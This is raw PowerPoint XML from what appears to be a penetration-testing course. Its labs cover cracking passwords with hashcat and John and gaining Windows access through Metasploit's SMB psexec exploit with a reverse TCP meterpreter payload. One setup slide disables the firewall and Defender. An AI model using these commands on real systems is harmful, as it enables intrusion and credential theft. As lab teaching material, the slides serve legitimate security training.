          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DBBAB1-EA56-4FF4-9453-7C0DDF2855DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoiler!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168003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99A944-0DE6-400D-A64E-0F4A4B1F7B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065C00F2-76FF-4F4C-8C0B-1166A3F6B260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hashcat -a 6 -m 1800 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hashes.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nmap.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>d?d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> --force -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hashes.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC294F67-1769-B643-B20D-3626240DD12F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283778" y="2425018"/>
            <a:ext cx="3657600" cy="1634732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4910BA-CDCC-1446-9D76-044B19222589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166529" y="1888664"/>
            <a:ext cx="4468541" cy="2333132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790076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A38AB-9527-4569-8460-2A09A9F37CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The last password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026AE5EB-685E-461B-9190-F382540B6CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a combination of either John, hashcat, to try and get the last password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume that we have a hint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Dan loves softball more than anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With "softball" as a seed, what is one way to mangle this to make a wordlist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You could use john rulesets such as l33t, add digits and case shifts using hashcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read documentation and practice each. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Try to crack it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2432483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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Dumping Windows hashes -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PSExec</a:t>
            </a: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7907966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Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this lab, we will use a meterpreter session on the Windows target to get hashes and practice some password cracking techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195394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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Se</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open up an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Administrative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a registry change to allow for psexec to execute files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>reg add HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>\Policies\system /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>LocalAccountTokenFilterPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> /t REG_DWORD /d 1 /f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>netsh advfirewall set allprofiles state off </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open up an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Administrative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Windows Defender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>MpPreference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>DisableRealtimeMonitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> $true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="863111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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use the metasploit database, so make sure postgresql is started and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is initialized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you can check status of the database with '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>db_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' and '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>db_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load an exploit that works with Windows against smb sessions, if you have a username and password, with psexec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set all required options to use the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set a payload for a reverse tcp meterpreter session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121169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Lab Setup &amp; Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this lab, we will use an existing password list and make a new password list from it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will try to use a tool to guess the password of the IEUser account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you are using your own Windows instance, you will need to enable SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, create a new user and add a password - "Passw0rd!" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WARNING: These passwords lists have profanity in them. If you are offended by vulgar language, you may want to skip this section or avoid looking at the password files (don't cat the raw files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287445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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35F2AD52-F642-465E-AFEA-47D5A0F65C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoiler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="525528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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285580" y="812195"/>
            <a:ext cx="8572840" cy="1610249"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>set PAYLOAD windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>set RHOST 10.10.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>SMBPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> Passw0rd!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
